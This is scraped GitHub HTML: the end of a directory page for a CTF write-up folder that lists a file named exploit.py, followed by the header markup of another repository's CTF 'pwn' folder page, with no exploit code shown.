<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list" data-turbo-frame="repo-content-turbo-frame"> <div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div> <footer class="SelectMenu-footer">View all tags</footer> </ref-selector> </div> </tab-container> </input-demux> </div></div>
</details>
</div>
<div class="Overlay--hidden Overlay-backdrop--center" data-modal-dialog-overlay> <modal-dialog role="dialog" id="warn-tag-match-create-branch-dialog" aria-modal="true" aria-labelledby="warn-tag-match-create-branch-dialog-header" data-view-component="true" class="Overlay Overlay--width-large Overlay--height-auto Overlay--motion-scaleFade"> <header class="Overlay-header Overlay-header--large Overlay-header--divided"> <div class="Overlay-headerContentWrap"> <div class="Overlay-titleWrap"> <h1 id="warn-tag-match-create-branch-dialog-header" class="Overlay-title">Name already in use</h1> </div> <div class="Overlay-actionWrap"> <button data-close-dialog-id="warn-tag-match-create-branch-dialog" aria-label="Close" type="button" data-view-component="true" class="close-button Overlay-closeButton"><svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button> </div> </div> </header> <div class="Overlay-body "> <div data-view-component="true"> A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?</div>
</div> <footer class="Overlay-footer Overlay-footer--alignEnd"> <button data-close-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn"> Cancel</button> <button data-submit-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn-danger btn"> Create</button> </footer></modal-dialog></div>
<div class="flex-1 mx-2 flex-self-center f4"> <div class="d-none d-sm-block"> <span><span><span>ctf-write-ups</span></span></span><span>/</span><span><span>0CTF2019</span></span><span>/</span>zerotask<span>/</span> </div> </div>
<div class="d-flex"> Go to file </div> </div>
<div class="f4 mt-3 mb-3 d-sm-none"><span><span><span>ctf-write-ups</span></span></span><span>/</span><span><span>0CTF2019</span></span><span>/</span>zerotask<span>/</span></div>
<div class="Box mb-3" > <div class="Box-header position-relative"> <h2 class="sr-only">Latest commit</h2> <div class="js-details-container Details d-flex rounded-top-2 flex-items-center flex-wrap" data-issue-and-pr-hovercards-enabled> <include-fragment src="/0n3m4ns4rmy/ctf-write-ups/tree-commit/1c47fb1fb361cd62e314ab6d919e0892f33f8efc/0CTF2019/zerotask" class="d-flex flex-auto flex-items-center" aria-busy="true" aria-label="Loading latest commit"> <div class="Skeleton avatar avatar-user flex-shrink-0 ml-n1 mr-n1 mt-n1 mb-n1" style="width:24px;height:24px;"></div> <div class="Skeleton Skeleton--text col-5 ml-3"> </div></include-fragment> <div class="flex-shrink-0"> <h2 class="sr-only">Git stats</h2> <svg text="gray" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-history"> <path d="m.427 1.927 1.215 1.215a8.002 8.002 0 1 1-1.6 5.685.75.75 0 1 1 1.493-.154 6.5 6.5 0 1 0 1.18-4.458l1.358 1.358A.25.25 0 0 1 3.896 6H.25A.25.25 0 0 1 0 5.75V2.104a.25.25 0 0 1 .427-.177ZM7.75 4a.75.75 0 0 1 .75.75v2.992l2.028.812a.75.75 0 0 1-.557 1.392l-2.5-1A.751.751 0 0 1 7 8.25v-3.5A.75.75 0 0 1 7.75 4Z"></path></svg> <span> History </span> </div> </div> </div> <h2 id="files" class="sr-only">Files</h2>
<include-fragment src="/0n3m4ns4rmy/ctf-write-ups/file-list/master/0CTF2019/zerotask"> Permalink
<div data-view-component="true" class="include-fragment-error flash flash-error flash-full py-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> Failed to load latest commit information.
</div> <div class="js-details-container Details" data-hpc> <div role="grid" aria-labelledby="files" class="Details-content--hidden-not-important js-navigation-container js-active-navigation-container d-block"> <div class="sr-only" role="row"> <div role="columnheader">Type</div> <div role="columnheader">Name</div> <div role="columnheader" class="d-none d-md-block">Latest commit message</div> <div role="columnheader">Commit time</div> </div> <div role="row" class="Box-row Box-row--focus-gray p-0 d-flex js-navigation-item" > <div role="rowheader" class="flex-auto min-width-0 col-md-2"> <span>. .</span> </div> <div role="gridcell" class="d-none d-md-block"></div> <div role="gridcell"></div> </div>
<div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-fg-muted"> <path d="M2 1.75C2 .784 2.784 0 3.75 0h6.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0 1 13.25 16h-9.5A1.75 1.75 0 0 1 2 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h9.5a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 9 4.25V1.5Zm6.75.062V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path></svg> </div>
<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>exploit.py</span> </div>
<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div>
<div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div>
</div> </div> </div>
</include-fragment>
</div>
</div>
</div>
</div>
</turbo-frame>
</main> </div>
</div>
<footer class="footer width-full container-xl p-responsive" role="contentinfo"> <h2 class='sr-only'>Footer</h2>
<div class="position-relative d-flex flex-items-center pb-2 f6 color-fg-muted border-top color-border-muted flex-column-reverse flex-lg-row flex-wrap flex-lg-nowrap mt-6 pt-6"> <div class="list-style-none d-flex flex-wrap col-0 col-lg-2 flex-justify-start flex-lg-justify-between mb-2 mb-lg-0"> <div class="mt-2 mt-lg-0 d-flex flex-items-center"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg> <span> © 2023 GitHub, Inc. </span> </div> </div>
<nav aria-label='footer' class="col-12 col-lg-8"> <h3 class='sr-only' id='sr-footer-heading'>Footer navigation</h3> Terms Privacy Security Status Docs Contact GitHub Pricing API Training Blog About </nav> </div>
<div class="d-flex flex-justify-center pb-6"> <span></span> </div></footer>
<div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> You can’t perform that action at this time. </div>
<div class="js-stale-session-flash flash flash-warn flash-banner" hidden > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>You signed in with another tab or window. Reload to refresh your session.</span> <span>You signed out in another tab or window. Reload to refresh your session.</span> </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-fg-default hx_rsm" open> <summary role="button" aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details></template>
<div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;" tabindex="0"> <div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;"> </div></div>
<template id="snippet-clipboard-copy-button"> <div class="zeroclipboard-container position-absolute right-0 top-0"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0 tooltipped-no-delay" data-copy-feedback="Copied!" data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-fg-success d-none m-2"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> </clipboard-copy> </div></template>
</div>
<div id="js-global-screen-reader-notice" class="sr-only" aria-live="polite" ></div> </body></html>
|
<html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com">
<link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/light-fe3f886b577a.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/dark-a1dbeda2886c.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-1ad5cf51dfeb.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-11d3505dc06a.css" /><link data-color-theme="dark_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-8b800495504f.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_colorblind-daa38c88b795.css" /><link data-color-theme="light_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_high_contrast-1b9ea565820a.css" /><link data-color-theme="light_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_tritanopia-e4be9332dd6c.css" /><link data-color-theme="dark_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_tritanopia-0dcf95848dd5.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/primer-c581c4e461bb.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/global-0e278d45156f.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/github-dcaf0f44dbb1.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/code-26709f54a08d.css" />
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/wp-runtime-774bfe5ae983.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-327bbf-0aaeb22dd2a5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_soft-nav_soft-nav_ts-21fc7a4a0e8f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/environment-e059fd03252f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-2646a2c533e3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_details-dialog-elemen-63debe-c04540d458d4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-b9368a9cb79e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_fzy_js_index_js-node_modules_github_markdown-toolbar-element_dist_index_js-e3de700a4c9d.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_js-node_modules_github_catalyst_-6afc16-e779583c369f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_text-ex-3415a8-7ecc10fb88d0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-79182d-befd2b2f5880.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_view-components_app_components_primer_primer_js-node_modules_gith-6a1af4-df3bc95b06d3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/github-elements-fc0e0b89822a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-1641411db24a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-9d9fe1859ce5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_manuelpuyol_turbo_dist_turbo_es2017-esm_js-4140d67f0cc2.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_alive-client_dist-bf5aa2-424aa982deef.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_hotkey_dist_-9fc4f4-d434ddaf3207.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-35b3ae68c408.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_github_session-resume_dist-def857-2a32d97c93c5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_paste-markdown_dist_index_esm_js-node_modules_github_quote-select-15ddcc-1512e06cfee0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_updatable-content_ts-430cacb5f7df.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_keyboard-shortcuts-helper_ts-app_assets_modules_github_be-f5afdb-8dd5f026c5b9.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-0af96d15a250.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_include-fragment_ts-app_assets_modules_github_behaviors_r-4077b4-75370d1c1705.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-7883159efa9e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-742151da9690.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-06ff531-32d7d1e94817.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/notifications-global-f5b58d24780b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_morphdom_dist_morphdom-esm_js-node_modules_github_template-parts_lib_index_js-58417dae193c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_memoize_dist_esm_index_js-8496b7c4b809.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-70450e-0370b887db62.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_ref-selector_ts-7bdefeb88a1a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/codespaces-d1ede1f1114e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_mini-throt-a33094-b03defd3289b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_mini-th-85225b-226fc85f9b72.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/repositories-8093725f8825.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/topic-suggestions-7a1f0da7430a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/code-menu-89d93a449480.js"></script>
<title>ctf/2019/Securinets/pwn at master · acdwas/ctf · GitHub</title>
<meta name="route-pattern" content="/:user_id/:repository/tree/*name(/*path)">
<meta name="current-catalog-service-hash" content="343cff545437bc2b0304c97517abf17bb80d9887520078e9757df416551ef5d6">
<meta name="request-id" content="D3CC:0D35:12B302C9:133413DA:64122510" data-pjax-transient="true"/><meta name="html-safe-nonce" content="d088f5f09f994d3275d6a1fb78e37ae8a11acd19564868a5076c0b4addb78ce6" data-pjax-transient="true"/><meta name="visitor-payload" content="eyJyZWZlcnJlciI6IiIsInJlcXVlc3RfaWQiOiJEM0NDOjBEMzU6MTJCMzAyQzk6MTMzNDEzREE6NjQxMjI1MTAiLCJ2aXNpdG9yX2lkIjoiODE5OTU2OTU1MTYzMDkzNTMxMiIsInJlZ2lvbl9lZGdlIjoiZnJhIiwicmVnaW9uX3JlbmRlciI6ImZyYSJ9" data-pjax-transient="true"/><meta name="visitor-hmac" content="aa2f11c4aaa71b4d00ee65fe6c48727b57771dcb1a059b68820f4178644e8a6c" data-pjax-transient="true"/>
<meta name="hovercard-subject-tag" content="repository:124655323" data-turbo-transient>
<meta name="github-keyboard-shortcuts" content="repository,source-code,file-tree" data-turbo-transient="true" />
<meta name="selected-link" value="repo_source" data-turbo-transient>
<meta name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY"> <meta name="google-site-verification" content="KT5gs8h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU"> <meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA"> <meta name="google-site-verification" content="GXs5KoUUkNCoaAZn7wPN-t01Pywp9M3sEjnt_3_ZWPc"> <meta name="google-site-verification" content="Apib7-x98H0j5cPqHWwSMm6dNU4GmODRoqxLiDzdx9I">
<meta name="octolytics-url" content="https://collector.github.com/github/collect" />
<meta name="analytics-location" content="/<user-name>/<repo-name>/files/disambiguate" data-turbo-transient="true" />
<meta name="user-login" content="">
<meta name="viewport" content="width=device-width"> <meta name="description" content="Contribute to acdwas/ctf development by creating an account on GitHub."> <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub"> <link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905" /> <meta name="twitter:image:src" content="https://opengraph.githubassets.com/9b98b72adb831b3851b01805511beba058a5c295fb1ddd78c19386b02ddab30b/acdwas/ctf" /><meta name="twitter:site" content="@github" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="ctf/2019/Securinets/pwn at master · acdwas/ctf" /><meta name="twitter:description" content="Contribute to acdwas/ctf development by creating an account on GitHub." /> <meta property="og:image" content="https://opengraph.githubassets.com/9b98b72adb831b3851b01805511beba058a5c295fb1ddd78c19386b02ddab30b/acdwas/ctf" /><meta property="og:image:alt" content="Contribute to acdwas/ctf development by creating an account on GitHub." /><meta property="og:image:width" content="1200" /><meta property="og:image:height" content="600" /><meta property="og:site_name" content="GitHub" /><meta property="og:type" content="object" /><meta property="og:title" content="ctf/2019/Securinets/pwn at master · acdwas/ctf" /><meta property="og:url" content="https://github.com/acdwas/ctf" /><meta property="og:description" content="Contribute to acdwas/ctf development by creating an account on GitHub." /> <link rel="assets" href="https://github.githubassets.com/">
<meta name="hostname" content="github.com">
<meta name="expected-hostname" content="github.com">
<meta name="enabled-features" content="TURBO_EXPERIMENT_RISKY,IMAGE_METRIC_TRACKING,GEOJSON_AZURE_MAPS">
<meta http-equiv="x-pjax-version" content="ef97471de14f8d2285f0269e8f0f7dc70845f693d3f6ccd2dd2daae5cd1bbebe" data-turbo-track="reload"> <meta http-equiv="x-pjax-csp-version" content="2a84822a832da97f1ea76cf989a357ec70c85713a2fd8f14c8421b76bbffe38c" data-turbo-track="reload"> <meta http-equiv="x-pjax-css-version" content="adfc12179419e463f9f320d07920b1684c9b7e060d4d9cd3a6cd5d0de37ce710" data-turbo-track="reload"> <meta http-equiv="x-pjax-js-version" content="711646ae23abb27cf728346f30f81c042d4428233a0795acf0e21ed664fe9d94" data-turbo-track="reload">
<meta name="turbo-cache-control" content="no-preview" data-turbo-transient="">
<meta data-hydrostats="publish">
<meta name="go-import" content="github.com/acdwas/ctf git https://github.com/acdwas/ctf.git">
<meta name="octolytics-dimension-user_id" content="17169107" /><meta name="octolytics-dimension-user_login" content="acdwas" /><meta name="octolytics-dimension-repository_id" content="124655323" /><meta name="octolytics-dimension-repository_nwo" content="acdwas/ctf" /><meta name="octolytics-dimension-repository_public" content="true" /><meta name="octolytics-dimension-repository_is_fork" content="false" /><meta name="octolytics-dimension-repository_network_root_id" content="124655323" /><meta name="octolytics-dimension-repository_network_root_nwo" content="acdwas/ctf" />
<link rel="canonical" href="https://github.com/acdwas/ctf/tree/master/2019/Securinets/pwn" data-turbo-transient> <meta name="turbo-body-classes" content="logged-out env-production page-responsive">
<meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats">
<meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors">
<meta name="browser-optimizely-client-errors-url" content="https://api.github.com/_private/browser/optimizely_client/errors">
<link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000"> <link rel="alternate icon" class="js-site-favicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg">
<meta name="theme-color" content="#1e2327"><meta name="color-scheme" content="light dark" />
<link rel="manifest" href="/manifest.json" crossOrigin="use-credentials">
</head>
<body class="logged-out env-production page-responsive" style="word-wrap: break-word;"> <div data-turbo-body class="logged-out env-production page-responsive" style="word-wrap: break-word;">
<div class="position-relative js-header-wrapper "> Skip to content <span> <span></span></span>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-04fa93bb158a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/sessions-9920eaa99f50.js"></script><header class="Header-old header-logged-out js-details-container Details position-relative f4 py-3" role="banner"> <button type="button" class="Header-backdrop d-lg-none border-0 position-fixed top-0 left-0 width-full height-full js-details-target" aria-label="Toggle navigation"> <span>Toggle navigation</span> </button>
